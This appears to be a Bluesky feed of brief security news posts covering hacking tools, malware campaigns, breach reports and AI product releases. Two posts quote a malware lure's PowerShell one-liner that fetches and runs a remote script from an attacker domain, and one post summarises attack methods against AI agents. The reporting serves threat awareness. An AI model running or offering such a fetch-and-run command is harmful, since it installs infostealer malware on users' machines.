LightNews LightNews
hasamba72.bsky.social
Hasamba
@hasamba72.bsky.social
6 followers 20 following 130 posts
https://linktr.ee/yanivr
linktr.ee
Posts Media Videos Starter Packs
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 1h
ARES is a PowerShell AD toolkit for authorized testing: enumerates SPNs, AS-REP accounts, KRBTGT status and GPOs; includes Kerberoast, AS-REP roast and rate-limited password spraying. #tool #kerberos #AD https://bit.ly/4n9f2B3
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2h
Doxxing of alleged Lumma Stealer operators and compromised Telegram accounts coincided with a steep fall in sample detections and C2 activity; customers shifted to Vidar and StealC. #lumma_stealer #water_kurita #doxxing https://bit.ly/46Z8SyJ
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2h
BlackBasta exfiltrated over 6M records from Capita in Mar 2023; ICO’s Oct 2025 report cites control failures across multiple legal entities and a £14M fine. #BlackBasta #Capita #ransomware https://bit.ly/4os7gTS
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 14h
Full AI Fundamentals 100 video (3+ hrs) from The Cyber Mentor: Intro to neural networks, NLP, LLMs and self-hosting LLMs. Free labs and a completion certificate are available via TCM Security Academy. #AI #LLMs #TCMSecurity https://bit.ly/3J3MISP
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 14h
Self-hosted no-code scraper: Scraperr uses XPath extraction, domain spidering and media downloads; backend stores results in MongoDB and exposes APIs via FastAPI. #tool #webscraping https://bit.ly/4qAmPen
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
DPRK actor UNC5342 stores JavaScript payloads in smart contracts (Ethereum, BNB Smart Chain); loader retrieves via eth_call and delivers JADESNOW / INVISIBLEFERRET, enabling crypto theft and resilient C2. #EtherHiding #UNC5342 #JADESNOW https://bit.ly/4qlCSfY
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
ExCyTIn-Bench evaluates LLM agents on threat hunting with an interactive MySQL database and generated security Q&A tests; dataset on Hugging Face; evaluations updated with Qwen‑235B and Grok‑4. #tool #LLM #dataset https://bit.ly/4nbwRj0
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
TikTok lure uses PowerShell iex (irm slmgr.win/photoshop) to fetch a script (SHA256: 6D897B56...) that downloads AuroStealer (updater.exe) and a self‑compiling loader (source.exe). #aurostealer #tiktok #malware https://bit.ly/4o2w7y2
1 1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
TikTok clips push a PowerShell one-liner that loads a malicious script (SHA256 6d897b...) leading to updater.exe (AuroStealer) and a self-compiling loader using csc.exe. #AuroStealer #PowerShell #TikTok https://bit.ly/4o2w7y2
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
Microsoft report: 52%+ of attacks with known motives tied to extortion/ransomware; 80% involved data theft; AI is accelerating phishing and malware development; MFA blocks >99% of identity attacks. #ransomware #MFA #AI https://bit.ly/3KTnFSY
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
Anthropic released Claude Skills: modular Markdown "skills" loaded on-demand via frontmatter YAML. Supports .pdf/.docx/.xlsx/.pptx, can run helper scripts (e.g., GIF builder) and checks like check_slack_size. #claude_skills #tool #anthropic https://bit.ly/3WJ2oOo
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 2d
YouTube video "stealing passwords" (ID DhP2Hw-6DgY) is listed but metadata and technical indicators are not provided in the input. #password_theft #infosec https://bit.ly/42Jqegz
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 3d
Netcraft uncovered Basic Auth phishing that embeds gmo-aozora[.]com in the username to spoof GMO Aozora; landing domains coylums[.], blitzfest[.], pavelrehurek[.] share /sKgdiq pages with a Japanese CAPTCHA. #phishing #basic_auth https://bit.ly/4n4m8GX
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 3d
ClatScope aggregates Perplexity, HaveIBeenPwned, Hunter and RapidAPI for deep IP/domain/email recon; Mini edition requires no API keys; paid subscriptions include pre-provisioned, rotated API keys with usage tracking. #tool #OSINT https://bit.ly/4qeF34y
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 4d
Pulseway RMM spotted in incidents: supports silent install and remote exec (CMD/PowerShell). Key artifacts: service 'PC Monitor', scheduled task 'PulsewayServiceCheck', registry HKLM\SOFTWARE\MMSOFT Design\PC Monitor. #Pulseway #RMM #DFIR https://bit.ly/4nXB3nQ
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 4d
Agentic AI Red Teaming Playbook: end-to-end methods for agentic layers, covering prompt injection, RAG data exfiltration, tool-chaining, and exploitation techniques. Practical, battle-tested examples. #redteaming #AI #LLMsecurity https://bit.ly/3WEgBMw
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Ducky bundles SSH/Telnet/Serial terminals, SNMP topology mapper, multi-threaded port scanner, subnet calculator and NIST CVE lookup into one PySide6 desktop GUI. #tool #python #snmp https://bit.ly/4n5vgLA
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Public websites often hold API keys, DB strings, S3/GCS tokens and staging/admin URLs — the guide shows how these secrets are commonly discovered and why one leak can cascade into larger compromise. #infosec #osint #bugbounty https://bit.ly/4nKD8TT
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Preconfigured Windows VM for DFIR investigations with a pinned DFIR_Toolbar and Explorer right-click integrations for artifact and disk-image parsing. Inspired by SIFT Workstation. #DFIR #WindowsForensics #tool https://bit.ly/3J6cZQb
1
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
ZeroTier builds a software-defined overlay with peer-to-peer direct connections, end-to-end encryption, and unique cryptographic IDs for device trust — targets IoT, SD‑WAN, and VPN use cases. #tool #zerotier https://bit.ly/3IK9ajP
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Wyrm v0.3 Hatchling: Rust post‑exploitation C2 with HTTP(S) agents, custom below‑TLS encryption, dynamic payload staging and anti‑YARA IOCs. #tool #redteam https://bit.ly/4qbgQMz
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Windows 11 Recall stores screenshots at %AppData%\Local\CoreAIPlatform...; Exif.Photo.MakerNote contains window title, path and timestamps; uses DiskANN DBs SemanticTextStore.sidb and SemanticImageS for search. #Windows11 #Recall #DFIR https://bit.ly/46NKIak
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
n8n workflow drives a Telegram AI agent that recognizes meals from photos, returns calorie and macro breakdowns, and logs results to a personal nutrition table. #n8n #Telegram #tool https://bit.ly/4haAUe6
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 5d
Paper2Video turns a paper+image+audio into a presentation video via PaperTalker; key components: slide generation, subtitling, cursor grounding, speech synthesis, and talking‑head rendering. Released code and a HuggingFace dataset. #paper2video #tool https://bit.ly/4nJteBX
hasamba72.bsky.social
Hasamba @hasamba72.bsky.social · 6d
Claude Code now supports plugins bundling slash commands, subagents, MCP servers and hooks; installable via /plugin in public beta and discoverable via marketplaces using a claude-plugin/marketplace.json. #plugins #MCP #tool https://bit.ly/42AIFUG